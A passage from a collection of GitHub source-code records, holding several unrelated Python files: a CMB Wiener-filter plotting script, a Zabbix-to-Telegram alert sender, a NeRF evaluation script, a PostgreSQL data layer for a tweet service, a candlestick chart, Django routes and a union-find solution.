ax.set_yscale('log')\n ax.set_ylim(ax.get_ylim())\n ax.plot(ells, dells * nl[idxs[0],idxs[1]] / b_ell[0] ** 2, lw=1, color='black')\n axs[0,0].set_ylim(0.1, 1e4)\n fig.savefig(opj(imgdir, 'ps_c_ell_log'))\n plt.close(fig)\n\n # Plot input sky signal.\n omap = curvedsky.make_projectable_map_by_pos(\n [[np.pi/2, -np.pi/2],[-np.pi, np.pi]], lmax, dims=(alm.shape[0],))\n omap = curvedsky.alm2map(alm, omap)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, range='250:5', downgrade=4)\n enplot.write(opj(imgdir, 'alm_in'), plot)\n\n if not test_conv:\n # Plot input data.\n alm_data = alm.copy()\n sht.map2alm(imap, alm, minfo, ainfo, [0, 2])\n curvedsky.alm2map(alm, omap, ainfo=ainfo)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, range='250:5', downgrade=4)\n enplot.write(opj(imgdir, 'imap'), plot)\n \n # Plot result\n omap = curvedsky.alm2map(solver.get_wiener(), omap)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, range='250:5', downgrade=4)\n if draw_constr:\n enplot.write(opj(imgdir, 'alm_constr'), plot)\n else:\n enplot.write(opj(imgdir, 'alm_out'), plot)\n\n if not draw_constr:\n omap = curvedsky.alm2map(solver.get_icov(), omap)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, downgrade=4)\n enplot.write(opj(imgdir, 'alm_icov'), plot)\n\n if test_conv:\n omap = curvedsky.alm2map(solver.get_wiener() - alm, omap)\n for pidx in range(3):\n plot = enplot.plot(omap[pidx], colorbar=True, font_size=50, grid=False, downgrade=4)\n enplot.write(opj(imgdir, f'alm_diff_{pidx}'), plot)\n\n b_out = solver.A(solver.x)\n omap_b_out = curvedsky.alm2map(b_out, omap.copy())\n omap_b_in = curvedsky.alm2map(solver.b0, omap.copy())\n omap_b_diff = curvedsky.alm2map(b_out - solver.b0, omap.copy())\n\n if not draw_constr:\n\n for pidx in range(alm.shape[0]):\n\n plot = enplot.plot(omap_b_out[pidx], colorbar=True, grid=False, font_size=50, downgrade=4)\n enplot.write(opj(imgdir, 'b_out_{}'.format(pidx)), plot)\n\n plot = enplot.plot(omap_b_in[pidx], colorbar=True, grid=False, font_size=50, downgrade=4)\n enplot.write(opj(imgdir, 'b_{}'.format(pidx)), plot)\n\n plot = enplot.plot(omap_b_diff[pidx], colorbar=True, grid=False, font_size=50, downgrade=4)\n enplot.write(opj(imgdir, 'b_diff_{}'.format(pidx)), plot)\n\n # Save the output.\n if not test_conv:\n map_utils.write_map(opj(odir, 'imap'), imap, minfo)\n hp.write_alm(opj(odir, 'alm_in.fits'), alm, overwrite=True)\n if not draw_constr:\n hp.write_alm(opj(odir, 'alm_icov.fits'), solver.get_icov(), overwrite=True)\n hp.write_alm(opj(odir, 'alm_out.fits'), solver.get_wiener(), overwrite=True)\n if draw_constr:\n hp.write_alm(opj(odir, 'alm_constr.fits'), solver.get_wiener(), overwrite=True)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('basedir', type=str,\n help='Output directory')\n parser.add_argument('--draw-constr', action='store_true',\n help='Draw a constrained realization')\n parser.add_argument('--test-conv', action='store_true',\n help='Replace b with A(x) for known LCDM x.')\n parser.add_argument('--niter-cg', type=int, default=20, \n help='Number of CG steps with nested CG as masked prec.')\n parser.add_argument('--niter-mg', type=int, default=40, \n help='Number of CG steps with multigrid as masked prec.')\n parser.add_argument('--no-masked-prec', action='store_true', \n help='Do not use the preconditioners for masked pixels.')\n parser.add_argument('--pol-mg', action='store_true', \n help='Use the multigrid precondioner for polarization as well.')\n parser.add_argument('--use-prec-harm', action='store_true', \n help='Use the harmonic preconditioner instead of the pseudo inverse.')\n parser.add_argument('--noise-scaling', type=float, \n help='Scale noise covariance by this number')\n parser.add_argument('--no-beam', action='store_true', \n help='Turn off beam.')\n parser.add_argument('--lmax-masked-cg', type=int, default=1500,\n help=\"lmax_masked_cg\")\n parser.add_argument('--write-steps', action='store_true',\n help=\"Write x to disk each step.\")\n args = parser.parse_args()\n\n print(args)\n\n main(args.basedir, draw_constr=args.draw_constr, test_conv=args.test_conv,\n niter_cg=args.niter_cg, niter_mg=args.niter_mg, no_masked_prec=args.no_masked_prec,\n pol_mg=args.pol_mg, use_prec_harm=args.use_prec_harm, noise_scaling=args.noise_scaling,\n no_beam=args.no_beam, lmax_masked_cg=args.lmax_masked_cg, write_steps=args.write_steps)\n","repo_name":"AdriJD/optweight","sub_path":"scripts/paper/planck_filter_pix.py","file_name":"planck_filter_pix.py","file_ext":"py","file_size_in_byte":18973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20945802053","text":"from dataclasses import dataclass\n\n\n@dataclass\nclass Peripheral:\n wiki_spec_name: str\n gsm_field: str\n gsm_name: str = None\n\n def __post_init__(self):\n if self.gsm_name is not None:\n return\n self.gsm_name = self.wiki_spec_name.lower()\n\n\nPERIPHERALS = [\n Peripheral('A-GPS', 'gps'),\n Peripheral('Accelerometer', 'sensors'),\n Peripheral('Barometer', 'sensors'),\n Peripheral('BeiDou', 'gps', 'BDS'),\n Peripheral('Compass', 'sensors'),\n Peripheral('FM Radio', 'radio'),\n Peripheral('Fingerprint', 'sensors'),\n Peripheral('Galileo', 'gps'),\n Peripheral('GLONASS', 'gps'),\n Peripheral('GPS', 'gps', 'Yes'),\n Peripheral('NAVIC', 'gps'),\n Peripheral('SBAS', 'gps'),\n Peripheral('QZSS', 'gps'),\n Peripheral('Gesture sensor', 'sensors', 'gesture'),\n Peripheral('Gyroscope', 'sensors', 'Gyro'),\n Peripheral('MHL', 'usb'),\n Peripheral('MHL 2', 'usb'),\n Peripheral('NFC', 'nfc', 'Yes'),\n Peripheral('Proximity sensor', 'sensors', 'proximity'),\n]\n","repo_name":"harryyoud/gsmarena_to_wiki","sub_path":"peripherals.py","file_name":"peripherals.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75244590568","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom urllib import parse, request, error\nfrom socket import timeout\nimport logging\nimport sys\nimport os\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nhandler = logging.FileHandler('/var/log/zabbix/telegram.log')\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\ndef send_message(message, subject):\n global result\n\n proxy = 'http://name:password@ip:port'\n\n os.environ['http_proxy'] = proxy\n os.environ['HTTP_PROXY'] = proxy\n os.environ['https_proxy'] = proxy\n os.environ['HTTPS_PROXY'] = proxy\n\n token = 'token'\n url = \"https://api.telegram.org/bot\" + token + \"/sendMessage\"\n params = parse.urlencode({\"chat_id\": -000, \"text\": message})\n params = params.encode('utf-8')\n\n try:\n\n logger.info('Subject = %s, MESSAGE = %s', subject, message)\n result = request.urlopen(url, params).read()\n logger.info('RESULT = %s', result)\n\n except error.HTTPError as e:\n logger.info('HTTP ERROR = %s', e)\n except error.URLError as e:\n logger.info('URL ERROR = %s', e)\n except Exception as e:\n logger.info('Exception = %s', e, result)\n except timeout:\n logger.info('socket timed out - URL %s', url)\n else:\n logger.info('Access successful.')\n\n\nif __name__ == \"__main__\":\n subj = sys.argv[1]\n message_list = []\n message_string = None\n\n for text_item in range(3, len(sys.argv)):\n message_list.append(sys.argv[text_item])\n\n message_string = ' '.join(str(element) for element in message_list)\n send_message(message_string, subj)\n","repo_name":"Barichpok/zabbix","sub_path":"send_message.py","file_name":"send_message.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27933004424","text":"import os, sys\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\nfrom pathlib import Path\r\nimport argparse\r\nimport json\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader\r\nfrom datasets.shapenet import build_shapenet\r\nfrom models.nerf import build_nerf\r\nfrom utils.shape_video import create_360_video\r\nfrom models.rendering import get_rays_shapenet, sample_points, volume_render\r\nimport torch.nn as nn\r\nimport cv2 as cv\r\n\r\n\r\ndef test_time_optimize(args, model, optim, imgs, poses, hwf, bound, idx):\r\n \"\"\"\r\n test-time-optimize the meta trained model on available views\r\n \"\"\"\r\n pixels = imgs.reshape(-1, 3)\r\n\r\n generate_samplimg_pixels = True # means load sampling_pixels True\r\n\r\n # get groud truth image's rays_o & rays_d\r\n # i think rays_d is defined as the rays direction, along(x-direction, y-direction, z-direction)\r\n rays_o, rays_d = get_rays_shapenet(hwf, poses)\r\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\r\n\r\n # num_rays is 128*128, which is the number of rays\r\n num_rays = rays_d.shape[0]\r\n\r\n if generate_samplimg_pixels:\r\n # store each instance's sampling pixels\r\n indices_range = []\r\n else:\r\n indices_range = torch.load('./sampling_pixels/1v_128p/instance_{}.pt'.format(idx+1))\r\n\r\n for step in range(args.tto_steps):\r\n # 128*128 rays are too many, so that we should sample a little rays for calculate loss\r\n if generate_samplimg_pixels:\r\n indices = torch.randint(num_rays, size=[args.tto_batchsize * 8])\r\n else:\r\n indices = indices_range[step]\r\n \r\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\r\n # pixelbatch is the sample_pixels in one image\r\n pixelbatch = pixels[indices] \r\n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\r\n args.num_samples, perturb=True)\r\n \r\n if generate_samplimg_pixels:\r\n indices_range.append(indices)\r\n \r\n optim.zero_grad()\r\n rgbs, sigmas = model(xyz)\r\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\r\n loss = F.mse_loss(colors, pixelbatch)\r\n loss.backward()\r\n optim.step()\r\n \r\n # store the indices\r\n if generate_samplimg_pixels:\r\n torch.save(indices_range, './sampling_pixels/1v_512p/instance_{}.pt'.format(idx+1))\r\n\r\ndef report_result(args, model, imgs, poses, hwf, bound):\r\n \"\"\"\r\n report view-synthesis result on heldout views\r\n \"\"\"\r\n ray_origins, ray_directions = get_rays_shapenet(hwf, poses)\r\n\r\n view_psnrs = []\r\n for img, rays_o, rays_d in zip(imgs, ray_origins, ray_directions):\r\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\r\n t_vals, xyz = sample_points(rays_o, rays_d, bound[0], bound[1],\r\n args.num_samples, perturb=False)\r\n \r\n synth = []\r\n num_rays = rays_d.shape[0]\r\n with torch.no_grad():\r\n for i in range(0, num_rays, args.test_batchsize):\r\n rgbs_batch, sigmas_batch = model(xyz[i:i+args.test_batchsize])\r\n color_batch = volume_render(rgbs_batch, sigmas_batch,\r\n t_vals[i:i+args.test_batchsize],\r\n white_bkgd=True)\r\n synth.append(color_batch)\r\n synth = torch.cat(synth, dim=0).reshape_as(img)\r\n error = F.mse_loss(img, synth)\r\n psnr = -10*torch.log10(error)\r\n view_psnrs.append(psnr)\r\n \r\n scene_psnr = torch.stack(view_psnrs).mean()\r\n return scene_psnr\r\n\r\n\r\ndef test():\r\n parser = argparse.ArgumentParser(description='shapenet few-shot view synthesis')\r\n parser.add_argument('--config', type=str, default='./configs/shapenet/chairs.json',\r\n help='config file for the shape class (cars, chairs or lamps)') \r\n parser.add_argument('--weight-path', type=str, default='./model_weight/model_1/model_1_meta_epoch15.pth',\r\n help='path to the meta-trained weight file')\r\n args = parser.parse_args()\r\n\r\n with open(args.config) as config:\r\n info = json.load(config)\r\n for key, value in info.items():\r\n args.__dict__[key] = value\r\n\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n test_set = build_shapenet(image_set=\"test\", dataset_root=args.dataset_root,\r\n splits_path=args.splits_path,\r\n num_views=args.tto_views+args.test_views)\r\n test_loader = DataLoader(test_set, batch_size=1, shuffle=False)\r\n\r\n model = build_nerf(args)\r\n model.to(device)\r\n\r\n # use multiple GPU to train the model\r\n if torch.cuda.device_count() > 1:\r\n model = nn.DataParallel(model)\r\n\r\n checkpoint = torch.load(args.weight_path, map_location=device)\r\n meta_state = checkpoint['meta_model_state_dict']\r\n\r\n savedir = Path(\"./videos_1v_wo\")\r\n savedir.mkdir(exist_ok=True)\r\n \r\n test_psnrs = []\r\n for idx, (imgs, poses, hwf, bound) in enumerate(test_loader):\r\n imgs, poses, hwf, bound = imgs.to(device), poses.to(device), hwf.to(device), bound.to(device)\r\n imgs, poses, hwf, bound = imgs.squeeze(), poses.squeeze(), hwf.squeeze(), bound.squeeze()\r\n \r\n # for i in range(imgs.shape[0]):\r\n # mae_img = imgs[i].cpu().numpy()\r\n # cv.imwrite(f\"mae_test/shapenet_{i}.jpg\", mae_img)\r\n\r\n tto_imgs, test_imgs = torch.split(imgs, [args.tto_views, args.test_views], dim=0)\r\n tto_poses, test_poses = torch.split(poses, [args.tto_views, args.test_views], dim=0)\r\n \r\n # load model weight which is single GPU saved\r\n if isinstance(model, torch.nn.DataParallel):\r\n model.state_dict = meta_state\r\n else:\r\n model.load_state_dict(meta_state)\r\n\r\n optim = torch.optim.SGD(model.parameters(), args.tto_lr)\r\n\r\n test_time_optimize(args, model, optim, tto_imgs, tto_poses, hwf, bound, idx)\r\n scene_psnr = report_result(args, model, test_imgs, test_poses, hwf, bound)\r\n\r\n # create_360_video(args, model, hwf, bound, device, idx+1, savedir)\r\n \r\n print(f\"scene {idx+1}, psnr:{scene_psnr:.3f}, video created\")\r\n test_psnrs.append(scene_psnr)\r\n\r\n # write psnr to file\r\n with open('./videos_1v_wo/psnr.txt','a') as f:\r\n f.write(\"video_{}: {}\\n\".format(idx+1, scene_psnr.cpu().numpy()))\r\n \r\n test_psnrs = torch.stack(test_psnrs)\r\n print(\"----------------------------------\")\r\n print(f\"test dataset mean psnr: {test_psnrs.mean():.3f}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n test()","repo_name":"yuchen-ji/pseudo-nerf","sub_path":"shapenet_test.py","file_name":"shapenet_test.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12894196276","text":"import logging\nfrom datetime import datetime\nfrom typing import Optional, Iterable, List, Union, Callable\n\nimport pg8000\nfrom flask import current_app\n\nfrom seventweets import db\nfrom seventweets.db import (\n TwResp, NdResp, _T,\n TWEET_COLUMN_ORDER, NODE_COLUMN_ORDER,\n)\n\nlogger = logging.getLogger(__name__)\nDbCallback = Callable[[pg8000.Cursor], _T]\n\n\nclass Database(pg8000.Connection):\n \"\"\"\n Thin wrapper around `pg8000.Connection` that allows executing queries\n on database and makes sure that connection is in valid state by\n performing commit and rollback when appropriate.\n \"\"\"\n\n def __init__(self):\n super(Database, self).__init__(\n user=current_app.config['ST_DB_USER'],\n host=current_app.config['ST_DB_HOST'],\n unix_sock=None,\n port=int(current_app.config['ST_DB_PORT']),\n database=current_app.config['ST_DB_NAME'],\n password=current_app.config['ST_DB_PASS'],\n ssl=False,\n timeout=None,\n )\n\n def test_connection(self):\n \"\"\"\n Performs trivial query on database to check if connection is\n successful. If not, this will raise exception.\n \"\"\"\n try:\n self.do(lambda cur: cur.execute('SELECT 1'))\n except Exception:\n logger.critical('Unable to execute query on database.')\n raise\n\n def cleanup(self):\n try:\n self.close()\n except pg8000.core.InterfaceError:\n # this exception is raised if db is already closed, which will\n # happen if class is used as context manager\n pass\n\n def do(self, fn: DbCallback) -> _T:\n \"\"\"\n Executes provided fn and gives it cursor to work with.\n\n Cursor will automatically be closed after, no matter that result of\n execution is. Return value is whatever `fn` returns.\n\n After each operation, commit is performed if no exception is raised.\n If exception is raised - transaction is rolled backed.\n\n :param fn:\n Function to execute. It has to accept one argument, cursor that it\n will use to communicate with database.\n :return: Whatever `fn` returns\n \"\"\"\n cursor = self.cursor()\n try:\n res = fn(cursor)\n self.commit()\n return res\n except Exception:\n self.rollback()\n raise\n finally:\n cursor.close()\n\n\nclass Operations(db.Operations):\n ################################################\n # Tweet related methods\n ################################################\n\n @staticmethod\n def get_all_tweets(cursor: pg8000.Cursor) -> Iterable[TwResp]:\n \"\"\"\n Returns all tweets from database.\n\n :param cursor: Database cursor.\n :return: All tweets from database.\n \"\"\"\n cursor.execute(f'''\n SELECT {TWEET_COLUMN_ORDER}\n FROM tweets\n ORDER BY created_at DESC\n ''')\n return cursor.fetchall()\n\n @staticmethod\n def get_tweet(id_: int, cursor: pg8000.Cursor) -> TwResp:\n \"\"\"\n Returns single tweet from database.\n :param id_: ID of tweet to get.\n :param cursor: Database cursor.\n :return: Tweet with provided ID.\n \"\"\"\n cursor.execute(f'''\n SELECT {TWEET_COLUMN_ORDER}\n FROM tweets WHERE id=%s;\n ''', (id_,))\n return cursor.fetchone()\n\n @staticmethod\n def insert_tweet(tweet: str, cursor: pg8000.Cursor) -> TwResp:\n \"\"\"\n Inserts new tweet and returns id of the created row\n\n :param tweet: Content of the tweet to add.\n :param cursor: Database cursor.\n :return: ID of the tweet that was created.\n \"\"\"\n cursor.execute(f'''\n INSERT INTO tweets (tweet) VALUES (%s)\n RETURNING {TWEET_COLUMN_ORDER};\n ''', (tweet,))\n return cursor.fetchone()\n\n @staticmethod\n def modify_tweet(id_: int, new_content: str,\n cursor: pg8000.Cursor) -> TwResp:\n \"\"\"\n Updates tweet content.\n\n :param id_: ID of tweet to update.\n :param new_content: New tweet content.\n :param cursor: Database cursor.\n :return:\n Tweet that was update, if tweet with provided ID was found, None\n otherwise.\n \"\"\"\n cursor.execute(f'''\n UPDATE tweets SET\n tweet=%s,\n modified_at=%s\n WHERE id=%s\n RETURNING {TWEET_COLUMN_ORDER};\n ''', (new_content, datetime.utcnow(), id_))\n return cursor.fetchone()\n\n @staticmethod\n def delete_tweet(id_: int, cursor: pg8000.Cursor) -> bool:\n \"\"\"\n Deletes tweet with provided ID from database.\n\n :param id_: ID of tweet to delete.\n :param cursor: Database cursor.\n :return:\n Boolean indicating if tweet with ID was deleted (False if tweetpyc\n does not exist).\n \"\"\"\n cursor.execute('''\n DELETE FROM tweets where id=%s\n ''', (id_,))\n return cursor.rowcount > 0\n\n @staticmethod\n def create_retweet(server: str, ref: str, cursor: pg8000.Cursor) -> TwResp:\n \"\"\"\n Creates retweet in database that references server and tweet ID\n provided in parameters.\n\n :param server: Server name of original tweet.\n :param ref: Tweet reference (ID) on original server.\n :param cursor: Database cursor.\n :return: Newly created tweet.\n \"\"\"\n cursor.execute(f'''\n INSERT INTO tweets (type, reference)\n VALUES (%s, %s)\n RETURNING {TWEET_COLUMN_ORDER};\n ''', ('retweet', f'{server}#{ref}'))\n return cursor.fetchone()\n\n @staticmethod\n def search_tweets(content: Optional[str], from_created: Optional[datetime],\n to_created: Optional[datetime],\n from_modified: Optional[datetime],\n to_modified: Optional[datetime],\n retweet: Optional[bool],\n cursor: pg8000.Cursor) -> Iterable[TwResp]:\n \"\"\"\n :param content: Content to search in tweet.\n :param from_created: Start time for tweet creation.\n :param to_created: End time for tweet creation.\n :param from_modified:\n Start time for tweet modification.\n :param to_modified:\n End time for tweet modification.\n :param retweet:\n Flag indication if retweet or original tweets should be searched.\n :param cursor: Database cursor.\n \"\"\"\n where: List[str] = []\n params: List[Union[str, datetime]] = []\n if content is not None:\n where.append('tweet ILIKE %s')\n params.append(f'%{content}%')\n if from_created is not None:\n where.append('created_at > %s')\n params.append(from_created)\n if to_created is not None:\n where.append('created_at < %s')\n params.append(to_created)\n if from_modified is not None:\n where.append('modified_at > %s')\n params.append(from_modified)\n if to_modified is not None:\n where.append('modified_at < %s')\n params.append(to_modified)\n if retweet is not None:\n where.append('type = %s')\n params.append('retweet')\n\n where_clause = 'WHERE ' + ' AND '.join(where) if len(where) > 0 else ''\n\n cursor.execute(f'''\n SELECT {TWEET_COLUMN_ORDER}\n FROM tweets\n {where_clause}\n ORDER BY created_at DESC\n ''', tuple(params))\n return cursor.fetchall()\n\n @staticmethod\n def count_tweets(type_: str, cursor: pg8000.Cursor) -> int:\n \"\"\"\n Returns number of tweets of specified type.\n\n :param type_: Type of tweet to count.\n :param cursor: Database cursor.\n \"\"\"\n where = ''\n params = []\n if type_:\n where = 'WHERE type=%s'\n params.append(type_)\n cursor.execute(f'''\n SELECT count(*)\n FROM tweets\n {where}\n ''', tuple(params))\n return cursor.fetchone()[0]\n\n ################################################\n # Node related methods\n ################################################\n\n @staticmethod\n def get_all_nodes(cursor: pg8000.Cursor) -> Iterable[NdResp]:\n \"\"\"\n :param cursor: Database cursor.\n :return: All nodes from database.\n \"\"\"\n cursor.execute(f'''\n SELECT {NODE_COLUMN_ORDER}\n FROM nodes\n ORDER BY last_checked_at;\n ''')\n return cursor.fetchall()\n\n @staticmethod\n def insert_node(name: str, address: str, cursor: pg8000.Cursor) -> NdResp:\n \"\"\"\n Inserts new nodes to database.\n\n :param name: Name of new node.\n :param address: Address of new node.\n :param cursor: Database cursor.\n :return: Node that was inserted.\n \"\"\"\n cursor.execute(f'''\n INSERT INTO nodes (name, address)\n VALUES (%s, %s)\n RETURNING {NODE_COLUMN_ORDER};\n ''', (name, address))\n return cursor.fetchone()\n\n @staticmethod\n def get_node(name: str, cursor: pg8000.Cursor) -> NdResp:\n \"\"\"\n :param name: Name of the node to get.\n :param cursor: Database cursor.\n :return: Node with provided name.\n \"\"\"\n cursor.execute(f'''\n SELECT {NODE_COLUMN_ORDER}\n FROM nodes\n WHERE name=%s;\n ''', (name,))\n return cursor.fetchone()\n\n @staticmethod\n def update_node(name: str, address: str, cursor: pg8000.Cursor) -> NdResp:\n \"\"\"\n Updates existing node.\n\n :param name: Name of the node to update.\n :param address: New address to set for the node.\n :param cursor: Database cursor.\n :return: Node that was updated.\n \"\"\"\n cursor.execute(f'''\n UPDATE nodes\n SET\n address = %s\n WHERE\n name = %s\n RETURNING {NODE_COLUMN_ORDER};\n ''', (address, name))\n return cursor.fetchone()\n\n @staticmethod\n def delete_node(name: str, cursor: pg8000.Cursor) -> bool:\n \"\"\"\n Deletes node from the database.\n\n :param name: Name of the node to delete.\n :param cursor: Database cursor.\n :return:\n Flag indicating if node was deleted or not. It is possible that\n node was not deleted if it was not found.\n \"\"\"\n cursor.execute(f'''\n DELETE FROM nodes\n WHERE name = %s;\n ''', (name,))\n return cursor.rowcount > 0\n\n @staticmethod\n def delete_all_nodes(cursor: pg8000.Cursor) -> bool:\n \"\"\"\n Deletes all nodes from the database.\n Only used when joining a network for updating the stale node list.\n\n :param cursor: Database cursor.\n :return:\n Flag indicating if nodes were deleted or not. It is possible that\n nodes weren't deleted if the list was previously empty.\n \"\"\"\n cursor.execute(f'''\n DELETE FROM nodes;''')\n return cursor.rowcount > 0\n","repo_name":"sbg/seventweets","sub_path":"seventweets/db/backends/pg.py","file_name":"pg.py","file_ext":"py","file_size_in_byte":11359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74397724967","text":"import os\nimport sys\nimport platform\nimport datetime as dt\nimport numpy as np\nimport matplotlib.pyplot as mp\nimport matplotlib.dates as md\n\n\ndef dmy2ymd(dmy):\n return dt.datetime.strptime(str(dmy, encoding='utf-8'),\n '%d-%m-%Y').date().strftime('%Y-%m-%d')\n\n\ndef read_data(filename):\n dates, opening_price, highest_price,\\\n lowest_price, close_price = np.loadtxt(\n filename,\n delimiter=',',\n usecols=(1, 3, 4, 5, 6),\n unpack=True,\n dtype=np.dtype('M8[D], f8, f8, f8, f8'),\n converters={1: dmy2ymd})\n # type of dates is python_datetime\n\n # print(dates)\n return dates, opening_price, highest_price,\\\n lowest_price, close_price\n\n\ndef init_chart(first_day, last_day):\n mp.gcf().set_facecolor(np.ones(3) * 240 / 255)\n mp.title('Candlestick Chart', fontsize=20)\n mp.xlabel('Trading Days From %s To %s' % (\n first_day.astype(md.datetime.datetime).strftime('%d-%m-%Y'),\n last_day.astype(md.datetime.datetime).strftime('%d-%m-%Y')),\n fontsize=14)\n mp.ylabel('Stock Price (USD) Of Apple Inc.', fontsize=14)\n\n # 设置刻度\n # get current axes\n ax = mp.gca()\n # 设置主刻度的显示格式,(周,周一)\n ax.xaxis.set_major_locator(md.WeekdayLocator(byweekday=md.MO))\n # 设置副刻度(天)\n ax.xaxis.set_minor_locator(md.DayLocator())\n # 设置主刻度的显示格式\n ax.xaxis.set_major_formatter(md.DateFormatter('%d-%m-%Y'))\n\n # 设置刻度的显示位置\n mp.tick_params(which='both',\n top=True,\n right=True,\n labelright=True,\n labelsize=10)\n mp.grid(linestyle=':')\n\n\ndef draw_chart(dates, opening_price, highest_price,\n lowest_price, close_price):\n # reset dates type to md.datetime.datetime\n dates = dates.astype(md.datetime.datetime)\n up = close_price - opening_price >= 1e-2\n down = opening_price - close_price >= 1e-2\n\n # 上涨的为红边,白芯.下跌的为绿边绿芯.不涨不跌的为黑\n # 填充色,每个元素三个浮点数(r, g, b),4字节\n fc = np.zeros(dates.size, dtype='3f4')\n # 上涨的填充色设为白色,下跌的填充色设为绿色\n fc[up], fc[down] = (1, 1, 1), (0, 0.5, 0)\n # 边缘色\n ec = np.zeros(dates.size, dtype='3f4')\n ec[up], ec[down] = (1, 0, 0), (0, 0.5, 0)\n\n # mp.bar(水平坐标,高度,比例,起始值)\n # 影线\n mp.bar(dates, highest_price - lowest_price, 0,\n lowest_price, align='center', color=fc, edgecolor=ec)\n # 实体\n mp.bar(dates, close_price - opening_price, 0.8,\n opening_price, align='center', color=fc, edgecolor=ec)\n\n mp.gcf().autofmt_xdate()\n\n\ndef show_chart():\n # setting biggest width and height of window\n # mng = mp.get_current_fig_manager()\n # if 'Windows' in platform.system():\n # mng.window.state()\n # else:\n # size = mng.window.maximumSize()\n # width = size.width()\n # height = size.height()\n # mng.resize(width, height)\n mp.show()\n\n\ndef main(argc, argv, envp):\n dates, opening_price, highest_price,\\\n lowest_price, close_price = read_data('./data/data/aapl.csv')\n # print(dates.dtype)\n init_chart(dates[0], dates[-1])\n draw_chart(dates, opening_price, highest_price,\n lowest_price, close_price)\n show_chart()\n return 0\n\n\nif __name__ == '__main__':\n # main(len(sys.argv), sys.argv, os.environ)\n sys.exit(main(len(sys.argv), sys.argv, os.environ))","repo_name":"zhnin/mypython","sub_path":"ml/cs.py","file_name":"cs.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3719671451","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n path('', views.index, name='index'),\n path('index_user', views.index_user, name='index_user'),\n path('login', views.login_user, name='login'),\n path('logout', views.logout_user, name='logout'),\n path('register', views.register, name='register'),\n path('animal', views.animal, name='animal'),\n path('animal_user', views.animal_user, name='animal_user'),\n path('add_animal', views.add_animal, name='add_animal'),\n path('allanimal',views.allanimal, name='allanimal'),\n\n #path('/', views.detail, name='detail'),\n #path('/results/', views.results, name='results'),\n #path('/vote/', views.vote, name='vote'),\n]","repo_name":"Tanung/pythonanywhere","sub_path":"mywed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31637231198","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nsys.setrecursionlimit(10**9)\n\nclass UnionFind():\n def __init__(self, n):\n self.n = n\n self.parents = [-1] * n\n\n def find(self,x):\n if(self.parents[x] < 0):\n return x\n self.parents[x] = self.find(self.parents[x])\n return self.parents[x]\n\n def size(self, x):\n return self.parents[ self.find(x) ] * -1\n\n def same(self, x, y):\n x_root = self.find(x)\n y_root = self.find(y)\n return (x_root == y_root)\n\n def union(self,x,y):\n x_root = self.find(x)\n y_root = self.find(y)\n if(x_root == y_root):\n return\n\n if( self.parents[x_root] <= self.parents[y_root] ):\n self.parents[x_root] += self.parents[y_root]\n self.parents[y_root] = x_root\n else:\n self.parents[y_root] += self.parents[x_root]\n self.parents[x_root] = y_root\n\n def members(self,x):\n root = self.find(x)\n ret = [ i for i in range(self.n) if self.find(i) == root ]\n return ret\n\n def roots(self):\n ret = [ i for i in range(self.n) if self.parents[i] < 0]\n return ret\n\n def group_count(self):\n return len(self.roots())\n\n def all_group_members(self):\n return {r: self.members(r) for r in self.roots()}\n\nn,m = map(int,readline().split())\nabct = list(map(int,read().split()))\n\nit = iter(abct)\nroad = [(a,b,c,t) for a,b,c,t in zip(it,it,it,it)]\n\nng = 0\nok = 10**6\nfor _ in range(30):\n mid = (ng+ok)/2\n uf = UnionFind(n)\n road.sort(key=lambda x:x[2] - mid*x[3])\n\n cost = 0\n for a,b,c,t in road:\n c_tmp = c - t*mid\n if(uf.same(a,b))&(c_tmp > 0):\n continue\n cost += c_tmp\n uf.union(a,b)\n\n if(cost < 0):\n ok = mid\n else:\n ng = 